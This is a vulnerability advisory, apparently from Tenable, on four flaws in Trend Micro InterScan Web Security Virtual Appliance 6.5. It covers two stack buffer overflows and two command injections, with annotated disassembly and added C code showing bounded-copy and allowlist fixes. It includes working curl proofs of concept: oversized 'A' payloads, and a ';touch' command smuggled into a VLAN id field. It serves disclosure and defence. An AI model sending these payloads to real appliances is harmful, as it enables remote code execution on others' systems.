Tenable found multiple vulnerabilities in Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 Service Pack 2, build 1901.
CVE-2020-28578: Unauthenticated Remote Stack Buffer Overflow
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_DecryptPasswd function in libuiauutil.so due to improper validation of user-supplied data before copying it to a fixed-size, stack-based buffer via the strcpy function:
.text:0001EC00 Java_com_trend_iwss_gui_IWSSJNI_DecryptPasswd proc near
.text:0001EC00 ; DATA XREF: LOAD:00003770↑o
.text:0001EC00
.text:0001EC00 dest= dword ptr -42Ch
.text:0001EC00 src= dword ptr -428h
.text:0001EC00 var_424= dword ptr -424h
.text:0001EC00 var_41C= byte ptr -41Ch
.text:0001EC00 var_10= dword ptr -10h
.text:0001EC00 var_C= dword ptr -0Ch
.text:0001EC00 var_8= dword ptr -8
.text:0001EC00 var_4= dword ptr -4
.text:0001EC00 arg_jniEnv= dword ptr 4
.text:0001EC00 arg_jstringPassword= dword ptr 0Ch
.text:0001EC00
.text:0001EC00 ; __unwind {
.text:0001EC00 sub esp, 42Ch
.text:0001EC06 mov [esp+42Ch+var_C], esi
.text:0001EC0D mov esi, [esp+42Ch+arg_jniEnv]
.text:0001EC14 mov edx, [esp+42Ch+arg_jstringPassword] ; attacker-controlled
.text:0001EC1B mov [esp+42Ch+var_10], ebx
.text:0001EC22 mov [esp+42Ch+var_8], edi
.text:0001EC29 lea edi, [esp+42Ch+var_41C]
.text:0001EC2D mov [esp+42Ch+var_4], ebp
.text:0001EC34 mov eax, [esi]
.text:0001EC36 call sub_1978D
.text:0001EC3B add ebx, 60FA9h
.text:0001EC41 mov [esp+42Ch+src], edx
.text:0001EC45 mov [esp+42Ch+var_424], 0
.text:0001EC4D mov [esp+42Ch+dest], esi
.text:0001EC50 ; convert jstring to char *
.text:0001EC50 call [eax+JNIEnv.GetStringUTFChars]
.text:0001EC56 mov [esp+42Ch+dest], edi ; fixed-size stack buf -> stack overflow !
.text:0001EC59 mov [esp+42Ch+src], eax ; attacker-controlled
.text:0001EC5D mov ebp, eax
.text:0001EC5F call _strcpy
...
Proof of Concept
An unauthenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /rest/windows_client_status on HTTPS port 8443:
curl -ski -d 'ip=localhost&basic=true&encry=false&password='$(python -c "print 'A'*0x1000") https://:8443/rest/windows_client_status
The attacker can potentially achieve remote code execution with the privileges of the iscan account.
CVE-2020-28579: Authenticated Remote Stack Buffer Overflow
The flaw exists in the MailNotification function in libuiauutil.so due to improper validation of user-supplied data before copying it to a fixed-size, stack-based buffer via the strcat function:
.text:00048950 MailNotification(char const*, char const*, char const*, char const*, char *) proc near
.text:00048950 ; CODE XREF: MailNotification(char const*,char const*,char const*,char const*,char *)↑j
.text:00048950 ; DATA XREF: LOAD:00005C10↑o
.text:00048950 ; .got.plt:off_803F8↓o
.text:00048950
.text:00048950 buf= dword ptr -564Ch
.text:00048950 c= dword ptr -5648h
.text:00048950 n= dword ptr -5644h
.text:00048950 var_5634= dword ptr -5634h
.text:00048950 var_5630= dword ptr -5630h
.text:00048950 var_562C= byte ptr -562Ch
.text:00048950 var_542C= byte ptr -542Ch
.text:00048950 var_502C= byte ptr -502Ch
.text:00048950 dest= byte ptr -3C2Ch
.text:00048950 var_282C= dword ptr -282Ch
.text:00048950 var_2828= byte ptr -2828h
.text:00048950 var_1428= dword ptr -1428h
.text:00048950 var_1424= byte ptr -1424h
.text:00048950 arg_mail_queue_path= dword ptr 4
.text:00048950 arg_sender_addr= dword ptr 8
.text:00048950 arg_trendlab_addr= dword ptr 0Ch
.text:00048950 arg_mailsubject= dword ptr 10h
.text:00048950 arg_bodymsg= dword ptr 14h
.text:00048950
.text:00048950 ; __unwind {
.text:00048950 push ebp
.text:00048951 push edi
.text:00048952 push esi
.text:00048953 push ebx
.text:00048954 call sub_1978D
.text:00048959 add ebx, 3728Bh
.text:0004895F sub esp, 563Ch
.text:00048965 lea eax, [esp+564Ch+dest]
.text:0004896C mov [esp+564Ch+n], 3C10h ; n
.text:00048974 lea ebp, [esp+564Ch+var_542C]
.text:0004897B mov [esp+564Ch+c], 0 ; c
.text:00048983 mov [esp+564Ch+buf], eax ; s
.text:00048986 call _memset
.text:0004898B mov eax, [esp+564Ch+arg_sender_addr]
.text:00048992 mov [esp+564Ch+c], eax ; attacker-controlled src data
.text:00048996 lea eax, [esp+564Ch+dest]
.text:0004899D mov [esp+564Ch+buf], eax ; fixed_size stack buf -> stack overflow!
.text:000489A0 call _strcat
...
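Both listings above copy an attacker-controlled string into a fixed-size stack buffer, DecryptPasswd with strcpy and MailNotification with strcat. As an added example (not Trend Micro's code), this is the bounded-copy pattern a fix for both functions would use: the copy is refused when the input does not fit, so the request is rejected rather than overflowing the frame. The 0x3C10 mail buffer length is the memset size in the MailNotification listing; the 0x400 password buffer size, all function names and the test inputs (runs of 'A' matching the lengths in the two proofs of concept) are assumptions.

```c
#include <string.h>

#define PASSWD_BUF_SZ 0x400u   /* assumed size of the DecryptPasswd stack buffer */
#define MAIL_BUF_SZ   0x3C10u  /* memset length used by MailNotification */

/* Copy src into dest only if the whole string, NUL included, fits. Returns 0 on
 * success, -1 if the input would overflow, so the caller rejects the request
 * instead of corrupting the stack (replaces strcpy). */
static int bounded_copy(char *dest, size_t dest_sz, const char *src)
{
    const char *nul = memchr(src, '\0', dest_sz);  /* never scan past dest_sz */
    if (nul == NULL) return -1;                    /* src is >= dest_sz bytes */
    memcpy(dest, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Append src to a NUL-terminated dest with the same rule (replaces strcat). */
static int bounded_append(char *dest, size_t dest_sz, const char *src)
{
    const char *end = memchr(dest, '\0', dest_sz);
    if (end == NULL) return -1;                    /* dest not terminated: refuse */
    size_t used = (size_t)(end - dest);
    return bounded_copy(dest + used, dest_sz - used, src);
}

/* Hypothetical hardened DecryptPasswd step: the UTF-8 bytes from GetStringUTFChars
 * reach the fixed stack buffer only if they fit. */
int passwd_fits_stack_buffer(const char *utf8_passwd)
{
    char dest[PASSWD_BUF_SZ];
    return bounded_copy(dest, sizeof dest, utf8_passwd);
}

/* Hypothetical hardened MailNotification step: zero the buffer as the original
 * does, then append the sender address with a bound. */
int sender_fits_mail_buffer(const char *sender_addr)
{
    char dest[MAIL_BUF_SZ];
    memset(dest, 0, sizeof dest);
    return bounded_append(dest, sizeof dest, sender_addr);
}

/* Constructed test input: n bytes of 'A', the shape used by the proofs of concept. */
const char *constructed_a_run(size_t n)
{
    static char run[0x10001];
    if (n >= sizeof run) n = sizeof run - 1;
    memset(run, 'A', n);
    run[n] = '\0';
    return run;
}
```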
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /urlf_reclassifyurl.jsp on HTTPS port 8443:
a) Log in with a low-privileged, reports-only user account
curl -ski -d 'wherefrom=&wronglogon=no&uid=reports_only_user&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Fri, 24 Jul 2020 20:14:44 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3C8680FE9EEE804422FD8813D58496A; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=B3C8680FE9EEE804422FD8813D58496A' -d 'op=send&url=MyUrl&sender_note=MySendNote&mailsubject=MyMailSubject&sender_addr='$(python -c "print 'A'*0x10000") https://:8443/urlf_reclassifyurl.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX
The attacker can potentially achieve remote code execution with the privileges of the iscan account.
CVE-2020-28580: Authenticated Command Injection in AddVLANItem
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_AddVLANItem function in libuiauutil.so due to improper validation of user-supplied data before passing it to a system shell:
.text:00020620 lea eax, (aUsrIwssAdminui - 7FBE4h)[ebx] ; "/usr/iwss/AdminUI/ui_ctl.sh"
.text:00020626 mov [esp+24Ch+param4], eax
.text:0002062A lea eax, (aSAddvlanitemS - 7FBE4h)[ebx] ; "%s addVLANItem %s"
.text:00020630 mov [esp+24Ch+param1], edx
.text:00020633 mov [esp+24Ch+param5], ebp ; attacker-controlled string
.text:00020637 mov [esp+24Ch+param3], eax ; format
.text:0002063B mov [esp+24Ch+param2], 1FFh ; maxlen
.text:00020643 mov [esp+24Ch+var_220], edx
.text:00020647 call _snprintf
.text:0002064C mov edx, [esp+24Ch+var_220]
.text:00020650 mov [esp+24Ch+param1], edx ; char *
.text:00020653 call system_with_fd_closed(char const*)
...
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings on HTTPS port 8443:
a) Log in with a high-privileged account
curl -ski -d 'wherefrom=&wronglogon=no&uid=admin&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 01:32:57 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E96E748E079915805B771A2F1E38D63E; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=E96E748E079915805B771A2F1E38D63E' -d 'CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&action=add&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
The attacker can execute arbitrary OS commands with the privileges of the iscan account.
CVE-2020-28581: Authenticated Command Injection in ModifyVLANItem
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_ModifyVLANItem function in libuiauutil.so due to improper validation of user-supplied data before passing it to a system shell:
.text:0002088D mov eax, [esp+24Ch+var_220]
.text:00020891 lea ecx, [esp+24Ch+s]
.text:00020895 mov [esp+24Ch+param5], edx ; attacker-controlled string
.text:00020899 mov [esp+24Ch+param1], ecx
.text:0002089C mov [esp+24Ch+param2], 1FFh ; maxlen
.text:000208A4 mov [esp+24Ch+param6], eax
.text:000208A8 lea eax, (aUsrIwssAdminui - 7FBE4h)[ebx] ; "/usr/iwss/AdminUI/ui_ctl.sh"
.text:000208AE mov [esp+24Ch+param4], eax
.text:000208B2 lea eax, (aSSetvlanitemin - 7FBE4h)[ebx] ; "%s setVLANItemIndex %s %d"
.text:000208B8 mov [esp+24Ch+param3], eax ; format
.text:000208BC mov [esp+24Ch+new], edx
.text:000208C0 call _snprintf
.text:000208C5 lea eax, [esp+24Ch+s]
.text:000208C9 mov [esp+24Ch+param1], eax ; char *
.text:000208CC call system_with_fd_closed(char const*)
...
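Both VLAN handlers above interpolate request fields into a ui_ctl.sh command line with snprintf and hand the result to system(). As an added example (not Trend Micro's code), this is the defensive pattern for AddVLANItem and ModifyVLANItem alike: every field is checked against a strict allowlist before it can reach a command line, and the command is then prepared as an argument vector for execv rather than a shell string, so a ';' like the one in the proofs of concept can never be interpreted. The field rules (dotted-quad ip and submask, short numeric port and id), the one-argument-per-field layout for ui_ctl.sh, and the function names are assumptions.

```c
#include <stdbool.h>
#include <string.h>
#define UI_CTL_PATH "/usr/iwss/AdminUI/ui_ctl.sh"  /* script path from the listings */

/* Dotted-quad IPv4 only: four decimal octets of 0..255 and nothing else. */
bool is_dotted_quad(const char *s)
{
    int octets = 0;
    while (*s != '\0') {
        int val = 0, digits = 0;
        while (*s >= '0' && *s <= '9' && digits < 3) {
            val = val * 10 + (*s - '0');
            s++; digits++;
        }
        if (digits == 0 || val > 255) return false;
        octets++;
        if (*s == '.') { s++; if (*s == '\0') return false; }
        else if (*s != '\0') return false;    /* any other byte: reject */
    }
    return octets == 4;
}

/* Short unsigned decimal only, for the port and id fields. */
bool is_small_decimal(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 5) return false;
    for (size_t i = 0; i < n; i++) if (s[i] < '0' || s[i] > '9') return false;
    return true;
}

/* True only when every field of a VLAN item matches its allowlist. */
bool vlan_item_is_valid(const char *ip, const char *submask, const char *port, const char *id)
{
    return is_dotted_quad(ip) && is_dotted_quad(submask) && is_small_decimal(port) && is_small_decimal(id);
}

/* Argument vector for execv(UI_CTL_PATH, argv): no shell parses the fields, so a
 * stray ';' would be one literal argument. NULL when validation fails. Static
 * storage, so one caller at a time. */
const char **build_add_vlan_argv(const char *ip, const char *submask,
                                 const char *port, const char *id)
{
    static const char *argv[7];
    if (!vlan_item_is_valid(ip, submask, port, id)) return NULL;
    argv[0] = UI_CTL_PATH; argv[1] = "addVLANItem"; argv[2] = ip;
    argv[3] = submask; argv[4] = port; argv[5] = id; argv[6] = NULL;
    return argv;
}
```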
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings on HTTPS port 8443:
a) Log in with a high-privileged account
curl -ski -d 'wherefrom=&wronglogon=no&uid=admin&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 03:37:45 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609' -d 'CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&action=modify&oldip=MyOldIp&oldsubmask=MyOldSubMask&oldport=MyOldPort&oldid=MyOldId&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
The attacker can execute arbitrary OS commands with the privileges of the iscan account.